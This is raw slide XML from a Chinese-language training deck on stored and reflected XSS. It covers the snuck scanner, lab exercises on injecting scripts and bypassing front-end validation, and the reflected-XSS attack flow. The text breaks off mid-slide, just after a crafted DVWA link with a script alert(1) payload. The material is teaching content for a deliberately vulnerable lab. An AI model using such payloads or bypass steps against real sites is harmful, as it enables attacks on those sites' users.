              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的渲染以及如何执行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1256333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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞扫描工具对存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞扫描方法</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>snuck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>snuck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是一款自动化的漏洞扫描工具，它可以帮助你扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用中存在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>snuck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Selenium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>开发，并且支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>浏览器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>snuck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与传统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全扫描工具有显著的区别，它会尝试利用特殊的注入向量来破坏网站的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤器，并通过这种方法提高漏洞的检出成功率。基本上说，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>snuck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所采用的检测方法与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>iSTAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞扫描工具的检测方法较为相似，但</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>snuck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>针对的是特定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通常都是利用收集的各类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>XSSpayloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来进行尝试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8135996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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>进行简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，在其他人访问时会弹出你的名字。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 编写弹出你名字的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 尝试插入到输入框</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 用其它方式绕过前台验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>最后确认</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1066848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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>尝试让其他人自动提交</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 编写自动提交代码的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 尝试插入到输入框</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 用其它方式绕过前台验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>最后确认</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="814540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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="64798"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="20340742">
            <a:off x="3495108" y="969382"/>
            <a:ext cx="4135325" cy="3130481"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11123153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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过本知识域，我们会：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的概念</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解什么是反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞与存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞的区别</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的利用与修复</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞的触发形式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞的利用方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掌握反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞检测和修复方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1156004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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般是提交信息的一部分内容通过服务器解析后反馈到浏览器，而不存储到服务器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>与存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不同的是，不能存储在服务器中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击方法一般都是构造了有恶意代码的链接（一般都是可信度高的网站）发送给受害者，受害者点击后会执行注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1290976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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用流程</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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32" y="1412776"/>
            <a:ext cx="1152128" cy="1152128"/>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688" y="4309425"/>
            <a:ext cx="1349716" cy="111947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1984" y="4259560"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="燕尾形箭头 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="983432" y="3068960"/>
            <a:ext cx="1152128" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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提供链接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="圆角矩形标注 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7680176" y="3212976"/>
            <a:ext cx="1440160" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61551"/>
              <a:gd name="adj2" fmla="val 41796"/>
              <a:gd name="adj3" fmla="val 16667"/>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服务器解析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>接收内容</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>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32" y="4221088"/>
            <a:ext cx="1152128" cy="1152128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="燕尾形箭头 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2135560" y="4509120"/>
            <a:ext cx="1152128" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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点击链接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="燕尾形箭头 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4727848" y="4941168"/>
            <a:ext cx="1152128" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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smtClean="0"/>
              <a:t>点击链接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="燕尾形箭头 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4637404" y="4305267"/>
            <a:ext cx="1208693" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 41718"/>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返回数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12656909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如何触发反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>构造有问题的链接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2" invalidUrl="http://mydvwa.com/dvwa/vulnerabilities/xss_r/?name=a&lt;script&gt;alert(1)&lt;/script&gt;"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3" invalidUrl="http://mydvwa.com/dvwa/vulnerabilities/xss_r/?name=a&lt;script&gt;alert(1)&lt;/script&gt;"/>
              </a:rPr>
              <a:t>://mydvwa.com/dvwa/vulnerabilities/xss_r</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4" invalidUrl="http://mydvwa.com/dvwa/vulnerabilities/xss_r/?name=a&lt;script&gt;alert(1)&lt;/script&gt;"/>
              </a:rPr>
              <a:t>/?</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
